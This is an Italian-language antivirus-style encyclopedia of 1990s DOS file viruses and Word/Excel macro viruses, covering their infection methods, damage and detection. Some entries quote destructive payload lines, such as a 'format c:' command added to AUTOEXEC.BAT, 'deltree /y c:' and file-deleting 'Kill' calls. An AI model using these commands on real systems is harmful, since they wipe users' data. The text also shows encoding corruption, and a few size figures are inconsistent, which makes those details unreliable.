Kiwi-550. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 550-570 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.EXE non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 550-570 Byte. [Dennis-2] Nome del Virus: Dennis-2. Tipo di Virus: Virus da file. (I file con estensione *.COM ed *.EXE). Lunghezza del Virus: 897 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 897 Byte. [Beer] Nome del Virus: Beer. Tipo di Virus: Virus da file. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file non infetto, il virus procede alla sua infezione. Danni: Nessuno. Note: Questo virus ha almeno tre varianti. [2560] Nome del Virus: 2560. Tipo di Virus: Virus da file. (I file con estensione *.COM ed *.EXE). Lunghezza del Virus: 2.560 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 2.560 Byte. [Atas-3321] Nome del Virus: Atas-3321. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM) Lunghezza del Virus: 3.321 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Il virus pu≥ eseguire i suoi programmi solo in DOS 3.3. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus procede alla sua infezione. Danni: Nessuno. Metodo di rilevazione: I file infetti aumentano di 3.321 Byte. [Ecu] Nome del Virus: Ecu. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 711 Byte. Vettore PC agganciato: INT 21h, INT 24h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. Il virus pu≥ eseguire i suoi programmi solo in DOS 3.3. Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.EXE non infetto, il virus procede alla sua infezione. Danni: La maggior parte dei file infetti non possono essere eseguiti. Metodo di rilevazione: I file infetti aumentano di 711 Byte. [N1] Nome del Virus: N1. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 10.230-10.240 Byte. Procedura eseguita: Il virus cerca i file con estensione *.COM non infetti nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). Il virus mostra poi il seguente messaggio : "This File Has Been Infected By NUMBER One!" Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti mostrano il suddetto messaggio quando vengono eseguiti. [Arcv-718] Nome del Virus: Arcv-718. Tipo di Virus: Virus da file. (I file con estensione *.COM ed *.EXE). Lunghezza del Virus: 718 Byte. Vettore PC agganciato: INT 21h. Procedura eseguita: 1) Controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 21h e torna alla funzione originale. 3) Controlla che la data corrente sia tra l'1 ed il 7 gennaio. Se "SI", il virus mostra il seguente messaggio e procede a bloccare il sistema: "Hello Dr Sol & Fido Lurve U lots... " Metodo di infezione: 1) Intercetta l'INT 21H(AH=4Bh) per infettare i file. Se il programma da eseguire Φ un file con estensione *.COM o *.EXE non infetto, il virus procede alla sua infezione. Danni: Il virus a volte blocca il sistema. Metodo di rilevazione: I file infetti aumentano di 718 Byte. [L-933] Nome del Virus: L-933. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 933-950 Byte. Procedura eseguita: 1) Cerca i file con estensione *.COM non infetti nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). 2) Controlla la data corrente. i) Se Φ il giorno 8 marzo, il virus distrugge tutti i dati sull'hard disk. ii) Se Φ il giorno 1 settembre, il virus si cancella. Danni: Il virus a volte distrugge tutti i dati sull'hard disk. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 933-950 Byte. [Alpha743] Nome del Virus: Alpha743. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 743 Byte. Procedura eseguita: 1) Cerca i file con estensione *.COM non infetti nella cartella in uso, quindi li infetta. (Infetta un solo file alla volta). 2) Controlla che l'anno corrente sia 1993 o successivi. Se il mese corrente Φ successivo a febbraio ed il giorno corrente Φ 5, il virus mostra il seguente messaggio: "Your PC has ALPHA virus. Brought to you by the ARCV Made in ENGLAND" Danni: Nessuno. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti aumentano di 743 Byte. [Clint] Nome del Virus: Clint. Tipo di Virus: Virus da file. (I file con estensione *.COM ed *.EXE). Procedura eseguita: 1) Cerca i file con estensione *.COM o *.EXE non infetti nella cartella in uso, quindi li infetta. (Infetta quattro file alla volta). 2) Mostra il seguente messaggio: "memoria allocation error !" Danni: Il virus sovrascrive il file originale con il proprio codice e questo corrompe i file. Note: 1) Non residente in memoria. 2) Appare un messaggio d'errore mentre scrive in quanto l'INT 24h non Φ stato agganciato. Metodo di rilevazione: I file infetti mostrano il suddetto messaggio quando vengono eseguiti. [Love-Child-2710] Nome del Virus: Love-Child-2710. Tipo di Virus: Virus da file. (Infetta i file con estensione *.COM). Lunghezza del Virus: 2.710 Byte. Vettore PC agganciato: INT 13h, INT 24h. Procedura eseguita: 1) Controlla che la data corrente sia uno dei seguenti giorni: 5 novembre, 22 febbraio, 23 giugno, 24 agosto, 6 ottobre o che il sistema non sia DOS 3.3. Se sono soddisfatte queste condizioni, il virus distrugge la Partizione e parti di FAT. Se le condizioni non sono soddisfatte, il virus controlla che sia residente in memoria. Se "NO", si carica nella memoria alta. 2) Intercetta l'INT 13h e torna alla funzione originale. Metodo di infezione: 1) Intercetta l'INT 13H per infettare i file. Per prima cosa aggancia l'INT 24h per prevenire la divulgazione di sue tracce mentre scrive. Se il programma da eseguire Φ un file con estensione *.COM non infetto, il virus procede alla sua infezione. Danni: Il virus a volte distrugge la Partizione e parti di FAT. Metodo di rilevazione: I file infetti aumentano di 2.710 Byte. [Basedrop] Nome del Virus: Basedrop. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Procedura eseguita: 1) Esiste il 25% di possibilitα che il virus ricerchi un file con estensione *.EXE non infetto nella cartella in uso, quindi lo infetti. (Infetta un solo file alla volta). 2) Esiste il 25% di possibilitα che il virus esporti la suddetta procedura. Compare quindi un messaggio che chiede di inviare la parola: "SLOVAKIA." Il virus attende fino all'invio di questa parola. Il virus quindi termina. 3) Esiste il 50% di possibilitα che il programma del virus non infetti i file. Danni: Nessuno. [Arianna] Nome del Virus: ARIANNA. Tipo di Virus: Virus multipartito. 1. File infetto residente in memoria alta. Il virus ARIANNA infetta solo i file con estensione *.EXE minori di 70000H Byte e maggiori di 1770H Byte. 2. Virus del settore di partizione. Questo virus sovrascrive gli ultimi 9 settori dell'hard drive. Lunghezza del Virus: 3.426 Byte. (I file con estensione *.EXE), 3586 Byte (memoria). Vettore PC agganciato: INT 21h. Processo di infezione: Questo virus viene diffuso dall'esecuzione di un programma infetto o da un computer con una Partizione infetta. Quando viene eseguito un file infettato da ARIANNA, il virus controlla che sia giα residente in memoria verificando che il valore di ritorno di AX sia uguale a 0 dopo l'INT 2f(ax=FE01). Se il virus Φ giα in memoria esegue il programma infetto. Il codice del virus rimane residente nella memoria alta. Danni: Diminuisce la memoria disponibile. I file infetti aumentano di 3.426 Byte. Sintomi: Mentre il virus ARIANNA Φ in memoria non si pu≥ cambiare la partizione dell'hard disk per non danneggiare il settore di partizione pulendolo. Il modo per pulire il sistema dal virus ARIANNA Φ avviare il computer con un dischetto di sistema pulito e sovrascrivere la partizione infetta con il No.9. [Boza] Nome del Virus: Boza. Pseudonimo: Bizatch. Tipo di Virus: Virus da file. (Infetta i file con estensione *.EXE). Lunghezza del Virus: 2.680 Byte. Procedura eseguita: Quando viene eseguito un file infetto, il virus non si installa nella memoria. Infetta i file che sono in Microsoft Win32. Il formato dei file Φ Portable Executable (PE) ci≥ significa che il virus infetta solo i file eseguibili di Win95 e Win32S. Il virus cerca di infettare pi∙ di tre file nella directory corrente; tuttavia, a causa di alcuni bachi nel programma possono essere alterati i file infetti. Quando la data di sistema raggiunge il giorno 31 di qualsiasi mese il virus mostra il seguente messaggio: "The taste of fame just got tastier! VLAD Australia does it again with the world's first Win95 Virus. From the old school to the new. Metabolis Qark Darkman Automag Antigen RhinceWind Quantum Absolute Overload CoKe" Il virus inoltre, contiene la seguente stringa: "Please note: the name of this virus is [Bizatch] written by Quantum of VLAD" [Word_Demonstrate] Nome del virus: Word.Demonstrate (Demonstration Macro Virus). Tipo di virus: Word.Demonstrate (Demonstration Macro Virus). Lunghezza del Virus: N/A. Descrizione: Il virus infetta i documenti di MS WORD. Questo virus Φ formato dalla seguente macro: AutoClose Quando viene aperto un file infetto, il virus infetta il modello principale "normal.dot" inserendo una singola macro. Una volta che il virus Φ attivo, infetta tutti i nuovi documenti che vengono chiusi. [Winexcel.DMV] Nome del Virus: Winexcel.DMV (Demonstration Macro Virus). Tipo di Virus: Virus da macro di Excel. Lunghezza del Virus: N/A. Descrizione: Questo virus infetta i documenti di MS EXCEL. Questo virus consiste nelle seguenti macro: Autoclose Quando viene chiuso un file infetto, il virus aggiunge una singola macro alle macro del file. Di conseguenza i file che sono stati chiusi hanno anche la macro del virus. Questo virus non Φ in grado di essere eseguito per un bug del programma. [Word_Xenixos] Nome del Virus: Word.Xenixos. Pseudonimo: Nemesis, Xos, Evil One, Xenixos:De. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 31.342 Byte (11 Macro). Tipo di infezione: Il virus infetta documenti e modelli principali di Microsoft Word versione tedesca. Sintomi: Aggiunta di testo ai documenti stampati. Formattazione del drive C:\ . Cambiamento di C:\AUTOEXEC.BAT. Mostra di finestre. Descrizione: Questo virus infetta i documenti di MS Word . Xenixos Φ il primo virus da macro scritto espressamente per la versione tedesca di Microsoft Word. Tutti i nomi delle macro sono in tedesco, quindi Φ attivo solamente con la versione tedesca di Word. Il virus Φ stato trovato in Austria, e quindi inviato su Usenet. Le seguenti macro possono essere trovate nei documenti infetti e visualizzate con il comando: Datei|Dokumentvorlage|Organisieren|Makros. "AutoExec" "AutoOpen" "DateiBeenden" "DateiDrucken" "DateiDruckenStandard" "DateiOeffnen" "DateiSpeichern" "DateiSpeichernUnter" "Drop" "Dummy" "ExtrasMakro" L'infezione del modello principale (NORMAL:DOT) include anche le seguenti macro: "AutoClose" "AutoExit" "AutoNew" Tutti contengono la macro vuota "Dummy". Quando viene aperto un documento infetto, Xenixon infetta il modello principale a meno che la macro "DateiSpeichernUnter" s ia ancora presente. Xenixon si diffonde usando "DateiSpeichern" (salva file) e "DateiSpeichernUnter" (Salva file come..."). Tutte la macro sono Execute-Only, qundi non possono essere viste o modificate. I file chiamati "VIRUS.DOT" non sono infettati. Durante l'infezione, Xenixon controlla la data del sistema e attiva diversi meccanismi (procedure) distruttivi regolati con la data. Durante il mese di maggio aggiunge a "C:\AUTOEXEC.BAT" il seguente testo: " @echo j format c: /u > nul " Questo comando formatta l'unitα C:\ se Φ presente il comando DOS "format". Durante il mese di marzo, Xenixos cerca di attivare il virus per DOS "Neuroquila" usando lo script DOS DEBUG. Questa parte del virus Φ imperfetta (cerca di creare un file con estensione *.EXE) e quindi il virus per DOS non infetta mai il sistema. Il terzo meccanismo distruttivo valuta l'ora del sistema ed in caso di valori maggiori di 45 nel campo dei secondi, aggiunge la password "XENIXOS" al documento salvato. Durante la stampa di un documento, Xenixos valuta ancora la data del sistema e in caso di valori minori di 30 nel campo dei secondi, aggiunge alla fine del documento stampato la seguente scritta: " Nemesis Corp. " Xenixos comprende inoltre alcuni trucchi affinchΘ sia pi∙ difficile identificarlo. Spegne i suggerimenti che Word invia prima di salvare un modello principale modificato e sostituisce i comandi Tools\Macro con un codice che fa apparire sul video il seguente messaggio invece di attivare il viewer\editor delle macro di Word: " Diese Option ist derzeit leider nicht verfuegbar " (questo impedisce all'utente di poter vedere le macro del virus). Quando viene avviato MS WORD, Xenixos copia parte delle sue macro e le salva con dei nuovi nomi (per esempio: "DateiSpeichern" -> "DateiSpeichernBak"). Quando un documento Φ aperto, Xenixos avvia il backup. Il seguente messaggio Φ stato trovato nel codice del virus, anche se non Φ mai apparso: " Brought to you by the Nemesis Corporation (c) 1996 " In pi∙ Xenixos sostituisce la sezione "Compatibility" all'interno del file WIN.INI. Stabilisce la variabile "RR"CD" nel valore "0x0020401" e la variabile "Diag$" allo "0". La variabile "WIN.INI" pu≥ essere usata per disattivare il virus. Impostatndo la variabile "Diag$" su "1" si possono prevenire la maggior parte dei meccanismi distruttivi. Alcuni replicanti di Xenixos fanno anche apparire il seguente messaggio d'errore di Wordbasic: " Falscher Parameter " [Word_Wieder] Nome del Virus: Word.Wieder. Pseudonimo: Wieder, Pferd. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 638 Byte (2 Macro). Sintomi: C:\Autoexec.bat Φ spostato e cancellato. Paese di origine: Germania. Descrizione: Questo virus infetta i documenti di MS Word . Wieder non Φ un virus ma un cavallo di Troia fino a quando non infetta altri file. La seguente macro non criptata pu≥ essere trovata nel documento infetto: "AutoClose" "AutoOpen" Quando viene aperto un documento infetto, Wieder crea la Directory "C:\TROJA" e sposta il file di sistema "C:\AUTOEXEC.BAT" nella nuova directory. Dopo aver spostato il file, quello originale viene cancellato. Quando sono chiusi documenti infetti viene visualizzato il seguente messaggio: "Auf Wieder÷ffnen" "P.S: Falls Sie Ihre AUTOEXEC.BAT - Datei" "gerne wiederhaben moechten, sollten Sie einen" "Blick in das neue Verzeichnis C:\TROJA werfen..." Ogni documento creato con Word 2.0 che include il " Cavallo di Troia" comprende anche il seguente testo: "Trojanisches Pferd " "Wenn Sie diese Zeilen lesen, wurde bereits Ihre AUTOEXEC.BAT- Datei aus dem" "Hauptverzeichnis C:\ entfernt. Hoffentlich haben Sie eine Kopie davon ? " "Genauso einfach waere es gewesen, Ihre Festplatte zu loeschen und mit ein " "klein wenig mehr Aufwand koennte man auch einen Virus installieren. " (c) Stefan Kurtzhals [Word_Wazzu] Nome del Virus: Word.Wazzu. Pseudonimo: WM.Wazzu. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 632 Byte (1 Macro). Sintomi: Le parole nel documento attivo sono cancellate. Viene inserita la parola 'wazzu' . Paese di origine: Washington, Stati Uniti. Descrizione: Questo virus infetta i documenti di MS Word. Wazzu.A ha solo una macro non criptata di 632 Byte, (la lettera iniziale non Φ maiuscola). "autoopen" Quando viene aperto un documento infetto, Wazzu.A controlla il nome del documento. In caso sia "NORMAL.DOT", la macro del virus Φ copiata dal modello principale (NORMAL.DOT) al documento aperto. Altrimenti, NORMAL.DOT diventa infetto. Durante l'infezione, i documenti sono cambiati in modelli. Ci≥ Φ molto comune per i virus da macro. Wazzu non bypassa i suggrimenti di Microsoft Word prima di salvare il file NORMAL.DOT. Inoltre Wazzu.A non controlla che il documento sia giα infetto. Sovrascrive semplicemente la macro "autoopen". Wazzu ha un procedimento distruttivo. Sceglie un numero a caso tra 0 ed 1 e se il numero Φ minore di 0.2 (20% di probabilitα), il virus sposta una parola del documento da un posto all'altro. Questo viene ripetuto per tre volte. Cos∞ la probabilitα che una parola possa essere spostata Φ del 48.8%. Dopo tre volte, Wazzu prende un ultimo numero casualmente (compreso tra 0 ed 1) e se il valore Φ superiore a 0.25 (probabilitα del 25%), la parola Wazzu viene inserita nel documento. Dopo che un documento Φ stato pulito, deve essere controllato con attenzione, perchΘ la possibilitα che il documento sia stato cambiato (parole cambiate o aggiunte) Φ superiore al 61%. Questo pu≥ risultare una grande perdita di tempo per documenti molto grandi. Wazzu Φ il soprannome della Washington State University. Da quando Wazzu.A usa la macro "autoopen", lavora anche con altre versioni di Microsoft Word, come per esempio la versione tedesca. (c) Stefan Kurtzhals [Word_Reflex] Nome del Virus: Word.Reflex. Pseudonimo: RedDwarf. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 897 Byte nei file con estensione *.DOC e 1.226 Byte nei file con estensione *.DOT (3 o 4 Macro) Sintomi: Mostra un messaggio in Windows. Paese di origine: Irlanda. Descrizione: Questo virus infetta Documenti di MS Word. Cancellare le macro del virus dai documenti infetti. (AutoOpen, FClose, FileClose, FA). Reflex contiene tre macro cifrate (Execute-Only) di 897 Byte. "AutoOpen" "FClose" "FileCLose" Un modello principale infetto contiene una o pi∙ macro ("FA"). Reflex spegne i suggerimenti di Word per essere sicuro di nascondere l'infezione del modello principale (NORMAL.DOT). I documenti infetti sono salvati con la password "Guardian." Sono anche convertiti in un modello. Cosa molto comune per i virus da macro. Reflex fu scritto in occasione di una conferenza sugli antivirus dopo che la Anti-Virus company lanci≥ la sfida agli hacker di riuscire a sconfiggere la loro nuova tecnologia. Ad ogni autore di un nuovo virus da macro non identificabile con il loro prodotto, fu promesso champagne come ricompensa. Quando Reflex infetta un file mostra il seguente messaggio: "Now, Where's that Jerbil of Bubbly? " Alcuni replicanti di Reflex mostrano anche il segunte messaggio d'errore di Wordbasic: "Document not open" [Word_Polite] Nome del Virus: Word.Polite. Pseudonimo: WW2Demo. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.918 Byte (2 Macro). Sintomi: Mostra un messaggio video. Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. Polite fu il primo virus creato per la versione 2.0 di Microsoft MS Word. Lavora ancora con versioni sucessive perchΦ le nuove release di Word sono compatibili con le vecchie. Polite consiste in due macro non criptate di 1.918 Byte. "FileClose" "FileSave as" Polite pu≥ essere chiamato un virus dimostrativo ed Φ difficile che si diffonda. Prima di infettare, mostra una finestra con la seguente domanda: " Shall I infect the file ? " (posso infettare il file?) Se l'utente risponde usando il tasto "No", nessun documento viene infettato. Mentre chiede il permesso per infettare un file, non chiede se pu≥ infettare il modello di documento principale (NORMAL.DOT). Infettando il modello principale o quando viene chiuso un documento infetto, Polite mostra il seguente messaggio: "I am alive! " Una volta che Polite ha infettato un documento di Word 6.0/7.0 non pu≥ pi∙ infettare nessun documento di Word 2.0. Il modello di documento principale (NORMAL.DOT) diventa infetto quando viene chiuso un documento infetto (solo quando non c'Φ la macro FileClose). I documenti diventano infetti usando il comando "FileSave as". Polite pur non usando nessuna Auto-macros non pu≥ essere bloccato dal parametro /m. Polite non lavora con versioni straniere di Microsoft Word, da quando usa le macro inglesi chiamate "FileSave as" e "FileClose". (c) Stefan Kurtzhals [Word.Pheeew] Nome del Virus: Word.Pheeew. Pseudonimo: Dutch, NietGoed, Pheeew:NL. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 2.759 Byte (4 Macro). Sintomi: Mostra un testo, cancella file in C:\ ed in C:\DOS. Paese di origine: Sconosciuto. Descrizione: Questo virus infetta Documenti di MS Word. Pheeew Φ il primo virus da macro tedesco ed Φ basato sul virus da macro Concept. Pheeew ha inoltre 4 macro non codificate: "AutoOpen" "IkWordNietGoed1" "IkWordNietGoed2" "Lading" Quando viene aperto un documento infetto, Pheeew controlla che ci sia stata un'infezione precedente del modello principale (NORMAL.DOT). Pheeew fa questo cercando il nome di due macro "Lading" e "BestandOpslaanAls". Quando il NORMAL.DOT non Φ infetto, Pheeew copia le proprie macro nel modello di documento principale. La macro "IkWordNietGoed2" Φ salvata con il nome "BestandOpslaanAls" ("FileSalva con nome "). I documenti sono infettati quando Φ usato il comando " FileSalva con nome ". I documenti sono convertiti in file di modello. Ci≥ Φ molto comune per i virus da macro. Dopo l'infezione il virus mostra diverse finestre con il seguente testo: Window "Important": " Gotcha ! " Window "FINAL WARNING!": "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC" Cliccando sul tasto "No" dell'ultima finestra, viene attivata una procedura distruttiva. Tutti i file in "C:\" ed in"C:\DOS" sono cancellati (alcuni attributi dei file vengono bypassati). Pheeew contiene inoltre il seguente testo: "Done by the Catman " Macro "Lading": " Sub MAIN " " REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " " REM *** WARNING *** " " REM You're computer could be killed right now! " " REM Thank to you and me it's still ok! " " REM Next time will be worse! " " REM *** PHEEEW! *** " " REM STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC " " End Sub " Pheeew lavora solamente con la versione tedesca di Microsoft Word. (c) Stefan Kurtzhals [Word_PCW] Nome del Virus: Word.PCW. Pseudonimo: Birthday, B-Day, Suzanne. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.039 Byte (2 Macro). Sintomi: Mostra messaggi. Paese di origine: Rivista di computer tedesca. Descrizione: Questo virus infetta Documenti di MS Word. PCW contiene due macro cifrate (Execute-Only) di 1.039 Byte. "AutoOpen" "DateiSpeichernUnter" Fu scelto questo nome perchΘ fu pubblicato su una rivista tedesca "PC Welt". Ci aspettiamo di vedere altre varianti di questo virus, da quando il suo codice Φ accessibile al pubblico. Aprendo un documento infetto, PCW infetta il modello principale (NORMAL.DOT). Altri documenti vengono infettati quando Φ usato il comando "DateiSpeichernUnter". I documenti infetti vengono internamente convertiti in file di modello. Ci≥ Φ molto comune per i virus da macro. PCW Φ conosciuto anche con il nome: "Birthday", dato che mostra la seguente finestra: " Happy Birthday! Herzlichen Glⁿckwunsch... " PCW usa nomi di macro tedesche quindi lavora solo con la versione tedesca di Microsoft Word. [Word_Nuclear] Nome del Virus: Word.Nuclear. Pseudonimo: Alert. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 10.556 Byte (9 Macro). Sintomi: Aggiunge testo ai documenti stampati. Sono cancellati file di sistema il giorno 5 Aprile. Paese di origine: Australia. Descrizione: Questo virus infetta Documenti di MS Word. Nuclear fu il secondo virus da macro trovato "In-the-Wild" (dopo Concept). Fu distribuito su Internet in un documento con informazioni sul virus Concept. Fu il primo virus da macro che us≥ macro Execute-Only (Criptate) per rendere l'analisi molto pi∙ difficile. Nuclear ha 9 macro lunghe10.556 Byte. "AutoExec" "AutoOpen" "DropSuriv" "FileExit" "FilePrint" "FilePrintDefault" "FileSave as" "InsertPayload" "Payload" Nuclear Φ attivato dalle macro "AutoExec"e "AutoOpen". Prima infetta il modello principale (NORMAL.DOT), controlla che ci sia stata un'infezione precedente. Non infetta se trova la macro "AutoExec". Dopo che le macro del virus sono state trasferite al modello principale, Nuclear pu≥ richiamare qualche procedura distruttiva. In primo luogo cerca di bloccare il virus "Ph33r". Tra le 17:00 e le 17:59 crea un file di testo, comprendente la scritta DOS/Windows-EXE del virus"Ph33r". Quindi usa il comando DOS "DEBUG.EXE" per convertire il file in un file eseguibile. Crea inoltre il file batch "EXEC_PH.BAT" e lo chiama dal DOS. L'ultima procedura di infezione Φ facoltativa, la finestra di DOS Φ chiusa immediatamente ed il virus "Ph33r" non infetta pi∙ il sistema. In secondo luogo, infettando un documento, Nuclear controlla l'ora di sistema. Se il valore Φ superiore a 55 nel campo dei secondi, aggiunge il seguente testo ai documenti stampati: "And finally I would like to say: " "STOP ALL FRENCH NUCLEAR TESTING IN THE PACIFIC La terza procedura distruttiva Φ attivata il giorno 5 aprile, quando Nuclear cancella i file di sistema "C:\IO.SYS", "C:\MSDOS.SYS" e "C:\COMMAND.COM. Chiudendo un file, Nuclear.A spegne i suggerimenti di Word per essere sicuro di nascondere l'infezione del modello principale (NORMAL.DOT). Questa funzione protettiva di Word Φ tuttavia inefficace con Nuclear. Nuclear infetta i documenti quando vengono salvati con "FileSave as", per cui tutti i documenti infetti sono trasformati internamente in file di modello. In pi∙, Nuclear non controlla che i documenti abbiano avuto una infezione precedente, sovrascrive semplicemente le macro esistenti. Da quando Nuclear usa i nomi delle macro inglesi, come per esempio "FileSave as", non lavora con versioni straniere di Microsoft Word, come per esempio la versione tedesca. (c) Stefan Kurtzhals [Word_NOP] Nome del Virus: Word.NOP. Pseudonimo: Nop.A:De. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 246 Byte (2 Macro). Sintomi: Nessun sintomo distruttivo. Paese di origine: Germania. Descrizione: Questo virus infetta Documenti di MS Word. NOP Φ il pi∙ piccolo virus da macro che si conosca essendo lungo 246 Byte. Infetta i documenti contenenti le seguenti due macro: "AutoOpen" "NOP" NOP Φ molto primitivo ed necessita solo di pochi comandi per replicarsi. Entrambe le due macro non sono criptate. L'unica caratteristica particolare Φ che spegne i suggerimenti di Word prima di salvare il modello principale (NORMAL.DOT). Quando viene aperto un documento infetto, il virus si trasferisce nel modello principale e rinomina "NOP" in "DateiSpeichernUnter" ("FileSave as"). Altri documenti diventano infetti quando vengono salvati. Infettando i documenti vengono anche convertiti in file di modello. Ci≥ Φ molto comune per i virus da macro. NOP.A non ha una procedura distruttiva, controllo di errori o ricognizione di altri documenti infetti. Le macro dei virus di altri documenti infetti vengono semplicemente sovrascritte. NOP.A usa la macro chiamata "DateiSpeichern" ("FileSave"), lavora quindi solo con la versione tedesca diMicrosoft Word. (c) Stefan Kurtzhals [Word_NF] Nome del Virus: Word.NF. Pseudonimo: Names, NF:De. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 4.209 Byte (6 Macro). Sintomi: Mostra finestre. Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. NF contiene due macro criptate (Execute-Only) di 286 Byte. "AutoClose" "NF" Quando viene aperto un documento infetto, NF infetta il modello principale (NORMAL.DOT). Altri documenti diventano infetti quando vengono chiusi. Infettando i documenti vengono anche convertiti in file di modello. Ci≥ Φ molto comune per i virus da macro. Infettando, NF mostra il seguente messaggio in cima allo schrmo: "Traced!" NF Φ uno dei pochi virus da macro non-distruttivi. [Word_MDMA] Nome del Virus: Word.MDMA. Pseudonimo: StickyKeys, MDMA-DMV. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 1.635 Byte (1 Macro). Sintomi: Vengono cancellati file. Paese di origine: Stati Uniti. Descrizione: Questo virus infetta Documenti di MS Word. MDMA Φ il primo virus che lavora su Windows, Windows 95, Macintosh e Windows NT. Pu≥ essere un virus da macro molto distruttivo. Agli utenti di Word Φ caldamente raccomandato di controllare il proprio sistema con degli aggiornati programmi anti-virus. MDMA contiene solo una macro di 1.635 Byte. "AutoClose" Quando viene aperto un documento infetto e poi chiuso, MDMA infetta il modello principale (NORMAL.DOT). Altri documenti diventano infetti quando vengono chiusi ("Auto-Close"). Infettando i documenti vengono anche convertiti in file di modello. Ci≥ Φ molto comune per i virus da macro. Se un documento infetto viene caricato il primo giorno del mese, MDMA attiva la sua procedura distruttiva. A seconda dei sistemi operativi vengono attuate le seguenti procedure: Windows: -------- Kill "c:\shmk."; "deltree /y c:" is added to autoexec.bat Questa cancella tutte le directory in drive C:\. Windows NT: ----------- Kill "*.*"; Kill "c:\shmk." Questa cancella tutti i file in drive C:\. Macintosh: ---------- Kill MacID$("****") Questa cancella tutti i file nell'hard drive. Windows 95: ----------- Kill "c" \shmk."; Kill "c:\windows\*.hlp"; Kill "c:\windows\system\*.cpl" SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\Stickykeys", "On", "1", "") SetPrivateProfileString ("HKEY_LOCAL_MACHINE\Network\Logon","ProcessLoginScript", "00","") SetPrivateProfileString ("HKEY_CURRENT_USER\Control Panel\Accessibility\HighContrst", "On", "1", "") MDMA mostra la seguente finestra: " You are infected with MDMA_DMV. Brought to you by MDMA (Many Delinquent " " Modern Anarchists)." Per combattere i virus da macro distruttivi, come per esmpio MDMA, consigliamo agli utenti di usare programmi anti-virus aggiornati. Microsoft ha anche rilasciato una nuova versione di Microsoft Word, che avvisa ogni volta che viene caricata una macro sospetta. L'utente pu≥ decidere se disabilitare la macro. L'upgrade di Microsoft Word Φ acquistabile con modica spesa da Microsoft. [Word_Maddog] Nome del Virus: Word.Maddog. Tipo di Virus: Virus da macro di Word. Lunghezza del Virus: 4.209 Byte (6 Macro). Sintomi: I documenti contengono la stringa "MadDog". 